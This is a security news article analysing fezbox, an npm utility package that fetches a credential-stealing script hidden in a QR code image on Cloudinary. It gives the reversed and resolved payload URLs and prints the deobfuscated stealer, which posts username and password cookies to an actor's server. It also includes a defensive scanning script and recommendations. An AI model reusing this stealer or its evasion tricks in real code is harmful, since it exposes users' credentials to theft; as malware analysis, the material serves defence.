
New npm Malware Steals Browser Passwords via Steganographic QR Code

A novel npm package named fezbox has been uncovered by the Socket Threat Research Team as a sophisticated malware delivery mechanism that exfiltrates username and password credentials from browser cookies via an embedded QR code.

Published under the npm alias janedu (registration email janedu0216@gmail[.]com), the package masquerades as a harmless JavaScript/TypeScript utility library while quietly fetching and executing obfuscated code within a steganographic QR code image hosted on Cloudinary.

At the time of writing, fezbox remains live on npm. Socket has petitioned the npm security team to remove the package and suspend the threat actor’s account.

The Package

fezbox describes itself as “a JavaScript/TypeScript utility library of common helper functions, organized by feature modules so you can import only what you need,” once translated from simplified Chinese.

Its README highlights features such as TypeScript types, integrated tests, high performance, and a “QR Code Module” for generating and parsing QR codes.

However, nowhere does it warn that simply importing the library triggers a background process that retrieves and runs code hidden within a remote QR code image.

Socket AI Scanner immediately flags fezbox as known malware, and its analysis reveals multiple layers of obfuscation designed to slip past static analysis tools and human reviewers.

Upon inspection, the minified CommonJS distribution file exposes a series of utility exports—everything from AES decryption to cookie and localStorage helpers—alongside a self-invoking function that delays execution of a malicious payload by two minutes.

The code first ensures it is running in a production environment (not a development or virtual sandbox) by checking a development flag and using a 2/3 probability guard.

After waiting 120 seconds, it instantiates a QRCodeScriptLoader and fetches a QR code image whose URL string is stored reversed to evade detection:

```javascript
"gpj.np6f7h_ffe7cdb1b812207f70f027671c18c25b/6177675571v/daolpu/egami/qsqbneuhd/moc.yraniduolc.ser//:sptth"
  .split("").reverse().join("")
```

When flipped, this resolves to:

```text
https://res.cloudinary.com/dhuenbqsq/image/upload/v1755767716/b52c81c176720f07f702218b1bdc7eff_h7f6pn.jpg
```

The loader parses the QR code from the image and executes the embedded JavaScript payload.

The Obfuscation

The threat actor applies three distinct obfuscation layers to conceal the credential-stealing behavior:

  1. Reversed Strings: Key strings—including the Cloudinary URL and the cookie name “password” reversed as "drowssap"—are stored backward to thwart simple static scans.
  2. Steganographic QR Code: The actual malicious script is hidden inside a standard-looking QR code image delivered from a trusted CDN.
  3. Minified and Encoded Payload: The QR code’s payload further encodes cookie access functions and network requests using Unicode escape sequences and inline string concatenations.
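As an added illustration (not code from the fezbox package or from Socket's report), the following Node.js script shows a minimal static check for two of the layers listed above: it reverses every string literal to see whether a URL or a sensitive cookie name emerges, and it decodes Unicode and hex escape sequences to reveal hidden API names. The sample source, the placeholder CDN URL and the regular expressions are constructed for this example.

```javascript
// Added example, not code from fezbox or the Socket report. A tiny static
// check for two of the obfuscation layers described above: string literals
// that become a URL or a sensitive cookie name when reversed, and literals
// that hide API names behind \uXXXX / \xXX escape sequences.

// Matches double- or single-quoted string literals (no nested quotes handled).
const STRING_LITERAL = /"((?:[^"\\]|\\.)*)"|'((?:[^'\\]|\\.)*)'/g;

const SENSITIVE_NAMES = ["username", "password", "token"];
const SENSITIVE_APIS = ["document.cookie", "localStorage", "fetch("];

// Decode JavaScript escape sequences without evaluating the code.
function decodeEscapes(s) {
  return s
    .replace(/\\u\{([0-9a-fA-F]+)\}/g, (_, h) => String.fromCodePoint(parseInt(h, 16)))
    .replace(/\\u([0-9a-fA-F]{4})/g, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}

// Returns a list of {kind, value} findings for one JavaScript source text.
function scanSource(src) {
  const findings = [];
  for (const m of src.matchAll(STRING_LITERAL)) {
    const raw = m[1] ?? m[2];
    const decoded = decodeEscapes(raw);
    const reversed = decoded.split("").reverse().join("");
    if (/^https?:\/\//i.test(reversed)) {
      findings.push({ kind: "reversed-url", value: reversed });
    } else if (SENSITIVE_NAMES.includes(reversed)) {
      findings.push({ kind: "reversed-name", value: reversed });
    }
    if (decoded !== raw && SENSITIVE_APIS.some(api => decoded.includes(api))) {
      findings.push({ kind: "escaped-api", value: decoded });
    }
  }
  return findings;
}

// Constructed sample mimicking the techniques in the report; the URL is a
// placeholder, not the real Cloudinary address.
const SAMPLE = `
const u = "gpj.elpmaxe/daolpu/moc.elpmaxe.ndc//:sptth".split("").reverse().join("");
const k = "drowssap";
const c = "\\u0064\\u006f\\u0063\\u0075\\u006d\\u0065\\u006e\\u0074.cookie";
const ok = "hello";
`;

console.log(scanSource(SAMPLE));
```

Run against a package's minified `dist` file, the same scan surfaces the reversed Cloudinary URL and the reversed cookie name that a plain substring search for `https://` or `password` would miss.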

Once deobfuscated, the payload reads:

```javascript
// Reads one cookie by name from document.cookie (undefined if absent)
function getC(name) {
  return document.cookie
    .split("; ")
    .find(row => row.startsWith(`${name}=`))
    ?.split("=")[1];
}

async function s() {
  // Cookie lookups reconstructed from the report's description; the page
  // extraction dropped these lines together with the braces.
  const username = getC("username");
  const password = getC("password");
  if (!username || !password) return;
  await fetch("https://my-nest-app-production.up.railway.app/users", {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify({ username, password })
  });
}

s();
```

This script harvests the username and password cookies if they exist and sends them via HTTPS POST to the actor’s server, then quietly exits.

Outlook and Recommendations

Modern web applications rarely store plaintext passwords in cookies, limiting the real-world impact of this specific attack.

Nevertheless, the creative use of a steganographic QR code underscores how threat actors will continually innovate to bypass security tools and evade detection.

Traditional static analysis might miss reversed strings or ignore QR code modules entirely, highlighting the need for dynamic and behavior-based dependency scanning.

Developers and security teams should enforce the following best practices:

  • Automated Dependency Scanning: Integrate tools like the Socket GitHub App or CLI into CI/CD pipelines to catch suspicious packages before they enter production.
  • Browser Extension Alerts: Install browser-based scanners that flag known malware and typosquatting signals at install time.
  • Zero-Trust Assumptions: Treat all third-party dependencies as untrusted until verified, especially those with seldom-used modules like QR code parsers.
  • Runtime Monitoring: Deploy endpoint protection that can detect unusual network requests or delayed execution patterns in client-side code.

By adopting a layered security approach that combines static checks, dynamic analysis, and runtime monitoring, organizations can stay ahead of increasingly sophisticated supply-chain attacks and protect user credentials from stealthy, obfuscated threats.
